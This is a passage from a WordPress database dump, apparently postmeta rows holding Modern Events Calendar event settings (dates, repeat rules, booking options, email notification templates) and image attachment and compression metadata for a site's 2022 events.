15,266399,'mec_ticket_variations','a:0:{}'),(156516,266399,'mec_reg_fields_global_inheritance','1'),(156517,266399,'mec_reg_fields','a:0:{}'),(156518,266399,'mec_bfixed_fields','a:0:{}'),(156519,266399,'mec_op','a:0:{}'),(156520,266399,'mec_fields','a:0:{}'),(156521,266399,'mec_event_status','EventScheduled'),(156522,266399,'mec_moved_online_link',''),(156523,266399,'mec_cancelled_reason',''),(156524,266399,'mec_display_cancellation_reason_in_single_page',''),(156525,266399,'boldgrid_hide_page_title','0'),(156526,266399,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156537,266400,'original-file','2022/03/open-doorway-1-updraft-pre-smush-original.jpg'),(156527,266399,'passster_activate_global_protection',NULL),(156528,266399,'passster_activate_protection',NULL),(156529,266399,'passster_protection_type','password'),(156531,266399,'_dp_original','266104'),(156532,266399,'_edit_lock','1648000035:2'),(156533,266399,'_edit_last','2'),(156534,266400,'_wp_attached_file','2022/03/open-doorway-1.jpg'),(156535,266400,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:389;s:4:\"file\";s:26:\"2022/03/open-doorway-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"open-doorway-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"open-doorway-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"open-doorway-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"open-doorway-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"open-doorway-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"open-doorway-1-300x389.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156541,266402,'protect_children',''),(156542,266402,'mec_color',''),(156543,266402,'mec_location_id','118'),(156544,266402,'mec_dont_show_map','0'),(156545,266402,'mec_organizer_id','1'),(156546,266402,'mec_read_more',''),(156547,266402,'mec_more_info',''),(156548,266402,'mec_more_info_title',''),(156549,266402,'mec_more_info_target','_self'),(156550,266402,'mec_cost',''),(156551,266402,'mec_currency','a:0:{}'),(156552,266402,'mec_additional_organizer_ids','a:0:{}'),(156553,266402,'mec_additional_location_ids','a:0:{}'),(156554,266402,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-25\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-25\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156555,266402,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156556,266402,'mec_certain_weekdays','a:0:{}'),(156557,266402,'mec_allday','0'),(156558,266402,'one_occurrence','0'),(156559,266402,'mec_hide_time','0'),(156560,266402,'mec_hide_end_time','0'),(156561,266402,'mec_comment',''),(156562,266402,'mec_timezone','global'),(156563,266402,'mec_countdown_method','global'),(156564,266402,'mec_public','1'),(156565,266402,'mec_start_date','2022-04-25'),(156566,266402,'mec_start_time_hour','7'),(156567,266402,'mec_start_time_minutes','0'),(156568,266402,'mec_start_time_ampm','PM'),(156569,266402,'mec_start_day_seconds','68400'),(156570,266402,'mec_end_date','2022-04-25'),(156571,266402,'mec_end_time_hour','8'),(156572,266402,'mec_end_time_minutes','0'),(156573,266402,'mec_end_time_ampm','PM'),(156574,266402,'mec_end_day_seconds','72000'),(156575,266402,'mec_repeat_status','0'),(156576,266402,'mec_repeat_type',''),(156577,266402,'mec_repeat_interval','1'),(156578,266402,'mec_repeat_end',''),(156579,266402,'mec_repeat_end_at_occurrences',''),(156580,266402,'mec_repeat_end_at_date',''),(156581,266402,'mec_advanced_days','a:0:{}'),(156582,266402,'mec_in_days',''),(156583,266402,'mec_not_in_days',''),(156584,266402,'mec_hourly_schedules','a:0:{}'),(156585,266402,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156586,266402,'mec_tickets','a:0:{}'),(156587,266402,'mec_fees_global_inheritance','1'),(156588,266402,'mec_fees','a:0:{}'),(156589,266402,'mec_ticket_variations_global_inheritance','1'),(156590,266402,'mec_ticket_variations','a:0:{}'),(156591,266402,'mec_reg_fields_global_inheritance','1'),(156592,266402,'mec_reg_fields','a:0:{}'),(156593,266402,'mec_bfixed_fields','a:0:{}'),(156594,266402,'mec_op','a:0:{}'),(156595,266402,'mec_fields','a:0:{}'),(156596,266402,'mec_event_status','EventScheduled'),(156597,266402,'mec_moved_online_link',''),(156598,266402,'mec_cancelled_reason',''),(156599,266402,'mec_display_cancellation_reason_in_single_page',''),(156600,266402,'boldgrid_hide_page_title','0'),(156601,266402,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156602,266402,'passster_activate_global_protection',NULL),(156603,266402,'passster_activate_protection',NULL),(156604,266402,'passster_protection_type','password'),(156607,266402,'_dp_original','266399'),(156606,266402,'_thumbnail_id','266400'),(156608,266402,'_edit_lock','1647999926:2'),(156609,266402,'_edit_last','2'),(156665,266405,'mec_currency','a:0:{}'),(156666,266405,'mec_additional_organizer_ids','a:0:{}'),(156667,266405,'mec_additional_location_ids','a:0:{}'),(156668,266405,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-24\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-24\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156669,266405,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156670,266405,'mec_certain_weekdays','a:0:{}'),(156671,266405,'mec_allday','0'),(156672,266405,'one_occurrence','0'),(156673,266405,'mec_hide_time','0'),(156674,266405,'mec_hide_end_time','0'),(156675,266405,'mec_comment',''),(156676,266405,'mec_timezone','global'),(156677,266405,'mec_countdown_method','global'),(156678,266405,'mec_public','1'),(156679,266405,'mec_start_date','2022-04-24'),(156680,266405,'mec_start_time_hour','10'),(156681,266405,'mec_start_time_minutes','30'),(156682,266405,'mec_start_time_ampm','AM'),(156683,266405,'mec_start_day_seconds','37800'),(156684,266405,'mec_end_date','2022-04-24'),(156685,266405,'mec_end_time_hour','11'),(156686,266405,'mec_end_time_minutes','30'),(156687,266405,'mec_end_time_ampm','AM'),(156688,266405,'mec_end_day_seconds','41400'),(156689,266405,'mec_repeat_status','0'),(156690,266405,'mec_repeat_type',''),(156691,266405,'mec_repeat_interval','1'),(156692,266405,'mec_repeat_end',''),(156693,266405,'mec_repeat_end_at_occurrences',''),(156694,266405,'mec_repeat_end_at_date',''),(156695,266405,'mec_advanced_days','a:0:{}'),(156696,266405,'mec_in_days',''),(156697,266405,'mec_not_in_days',''),(156698,266405,'mec_hourly_schedules','a:0:{}'),(156699,266405,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156700,266405,'mec_tickets','a:0:{}'),(156701,266405,'mec_fees_global_inheritance','1'),(156702,266405,'mec_fees','a:0:{}'),(156703,266405,'mec_ticket_variations_global_inheritance','1'),(156704,266405,'mec_ticket_variations','a:0:{}'),(156705,266405,'mec_reg_fields_global_inheritance','1'),(156706,266405,'mec_reg_fields','a:0:{}'),(156707,266405,'mec_bfixed_fields','a:0:{}'),(156708,266405,'mec_op','a:0:{}'),(156709,266405,'mec_fields','a:0:{}'),(156710,266405,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156711,266405,'mec_event_status','EventScheduled'),(156712,266405,'mec_moved_online_link',''),(156713,266405,'mec_cancelled_reason',''),(156714,266405,'mec_display_cancellation_reason_in_single_page',''),(156715,266405,'protect_children',''),(156716,266405,'passster_activate_global_protection',NULL),(156717,266405,'passster_activate_protection',NULL),(156718,266405,'passster_protection_type','password'),(156719,266405,'boldgrid_hide_page_title','0'),(156720,266405,'_thumbnail_id','266410'),(156722,266405,'_dp_original','266312'),(156723,266405,'_edit_lock','1648136460:2'),(156724,266405,'_edit_last','2'),(156725,266407,'protect_children',''),(156726,266407,'mec_color',''),(156727,266407,'mec_location_id','118'),(156728,266407,'mec_dont_show_map','0'),(156729,266407,'mec_organizer_id','1'),(156730,266407,'mec_read_more',''),(156731,266407,'mec_more_info',''),(156732,266407,'mec_more_info_title',''),(156733,266407,'mec_more_info_target','_self'),(156734,266407,'mec_cost',''),(156735,266407,'mec_currency','a:0:{}'),(156736,266407,'mec_additional_organizer_ids','a:0:{}'),(156737,266407,'mec_additional_location_ids','a:0:{}'),(156738,266407,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-06\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156739,266407,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156740,266407,'mec_certain_weekdays','a:0:{}'),(156741,266407,'mec_allday','0'),(156742,266407,'one_occurrence','0'),(156743,266407,'mec_hide_time','0'),(156744,266407,'mec_hide_end_time','0'),(156745,266407,'mec_comment',''),(156746,266407,'mec_timezone','global'),(156747,266407,'mec_countdown_method','global'),(156748,266407,'mec_public','1'),(156749,266407,'mec_start_date','2022-04-06'),(156750,266407,'mec_start_time_hour','7'),(156751,266407,'mec_start_time_minutes','0'),(156752,266407,'mec_start_time_ampm','PM'),(156753,266407,'mec_start_day_seconds','68400'),(156754,266407,'mec_end_date','2022-04-06'),(156755,266407,'mec_end_time_hour','8'),(156756,266407,'mec_end_time_minutes','0'),(156757,266407,'mec_end_time_ampm','PM'),(156758,266407,'mec_end_day_seconds','72000'),(156759,266407,'mec_repeat_status','0'),(156760,266407,'mec_repeat_type',''),(156761,266407,'mec_repeat_interval','1'),(156762,266407,'mec_repeat_end',''),(156763,266407,'mec_repeat_end_at_occurrences',''),(156764,266407,'mec_repeat_end_at_date',''),(156765,266407,'mec_advanced_days','a:0:{}'),(156766,266407,'mec_in_days',''),(156767,266407,'mec_not_in_days',''),(156768,266407,'mec_hourly_schedules','a:0:{}'),(156769,266407,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(156770,266407,'mec_tickets','a:0:{}'),(156771,266407,'mec_fees_global_inheritance','1'),(156772,266407,'mec_fees','a:0:{}'),(156773,266407,'mec_ticket_variations_global_inheritance','1'),(156774,266407,'mec_ticket_variations','a:0:{}'),(156775,266407,'mec_reg_fields_global_inheritance','1'),(156776,266407,'mec_reg_fields','a:0:{}'),(156777,266407,'mec_bfixed_fields','a:0:{}'),(156778,266407,'mec_op','a:0:{}'),(156779,266407,'mec_fields','a:0:{}'),(156780,266407,'mec_event_status','EventScheduled'),(156781,266407,'mec_moved_online_link',''),(156782,266407,'mec_cancelled_reason',''),(156783,266407,'mec_display_cancellation_reason_in_single_page',''),(156784,266407,'boldgrid_hide_page_title','0'),(156785,266407,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(156786,266407,'passster_activate_global_protection',NULL),(156787,266407,'passster_activate_protection',NULL),(156788,266407,'passster_protection_type','password'),(156790,266407,'_dp_original','266104'),(156791,266407,'_edit_lock','1648178615:2'),(156792,266407,'_edit_last','2'),(156793,266408,'_wp_attached_file','2022/03/relationships-1.jpg'),(156794,266408,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:27:\"2022/03/relationships-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"relationships-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"relationships-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:27:\"relationships-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:27:\"relationships-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:27:\"relationships-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:27:\"relationships-1-300x380.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156795,266407,'_thumbnail_id','266408'),(156796,266410,'_wp_attached_file','2022/03/sunset-horizon-2.jpg'),(156797,266410,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:760;s:6:\"height\";i:397;s:4:\"file\";s:28:\"2022/03/sunset-horizon-2.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-2-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"sunset-horizon-2-300x397.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:397;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(156798,266410,'original-file','2022/03/sunset-horizon-2-updraft-pre-smush-original.jpg'),(156799,266410,'smush-complete','1'),(156800,266410,'smush-info','The file was compressed from 41.98 KB to 40.41 KB saving 3.76 percent using WP-Optimize'),(156801,266410,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:42991;s:12:\"smushed-size\";i:41376;s:15:\"savings-percent\";d:3.7599999999999997868371792719699442386627197265625;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:42991;s:10:\"compressed\";i:41376;}s:6:\"medium\";a:2:{s:8:\"original\";i:7736;s:10:\"compressed\";i:7670;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3746;s:10:\"compressed\";i:3680;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:11123;s:10:\"compressed\";i:11123;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:19221;s:10:\"compressed\";i:19221;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:13751;s:10:\"compressed\";i:13751;}s:8:\"tileview\";a:2:{s:8:\"original\";i:13328;s:10:\"compressed\";i:13328;}}}'),(156802,266408,'original-file','2022/03/relationships-1-updraft-pre-smush-original.jpg'),(156803,266408,'smush-complete','1'),(156804,266408,'smush-info','The file was compressed from 51.31 KB to 49.74 KB saving 3.05 percent using WP-Optimize'),(156805,266408,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:52538;s:12:\"smushed-size\";i:50934;s:15:\"savings-percent\";d:3.04999999999999982236431605997495353221893310546875;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:52538;s:10:\"compressed\";i:50934;}s:6:\"medium\";a:2:{s:8:\"original\";i:15055;s:10:\"compressed\";i:14926;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8076;s:10:\"compressed\";i:8010;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21546;s:10:\"compressed\";i:21361;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:32804;s:10:\"compressed\";i:32553;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24505;s:10:\"compressed\";i:24261;}s:8:\"tileview\";a:2:{s:8:\"original\";i:25765;s:10:\"compressed\";i:25560;}}}'),(156806,266411,'protect_children',''),(156807,266411,'mec_color',''),(156808,266411,'mec_location_id','118'),(156809,266411,'mec_dont_show_map','0'),(156810,266411,'mec_organizer_id','1'),(156811,266411,'mec_read_more',''),(156812,266411,'mec_more_info',''),(156813,266411,'mec_more_info_title',''),(156814,266411,'mec_more_info_target','_self'),(156815,266411,'mec_cost',''),(156816,266411,'mec_currency','a:0:{}'),(156817,266411,'mec_additional_organizer_ids','a:0:{}'),(156818,266411,'mec_additional_location_ids','a:0:{}'),(156819,266411,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-04\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-04\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(156820,266411,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(156821,266411,'mec_certain_weekdays','a:0:{}'),(156822,266411,'mec_allday','0'),(156823,266411,'one_occurrence','0'),(156824,266411,'mec_hide_time','0'),(156825,266411,'mec_hide_end_time','0'),(156826,266411,'mec_comment',''),(156827,266411,'mec_timezone','global'),(156828,266411,'mec_countdown_method','global'),(156829,266411,'mec_public','1'),(156830,266411,'mec_start_date','2022-05-04'),(156831,266411,'mec_start_time_hour','7'),(156832,266411,'mec_start_time_minutes','0'),(156833,266411,'mec_start_time_ampm','PM'),(156834,266411,'mec_start_day_seconds','68400'),(156835,266411,'mec_end_date','2022-05-04'),(156836,266411,'mec_end_time_hour','8'),(156837,266411,'mec_end_time_minutes','0'),(156838,266411,'mec_end_time_ampm','PM'),(156839,266411,'mec_end_day_seconds','72000'),(156840,266411,'mec_repeat_status','0'),(156841,266411,'mec_repeat_type',''),(156842,266411,'mec_repeat_interval','1'),(156843,266411,'mec_repeat_end',''),(156844,266411,'mec_repeat_end_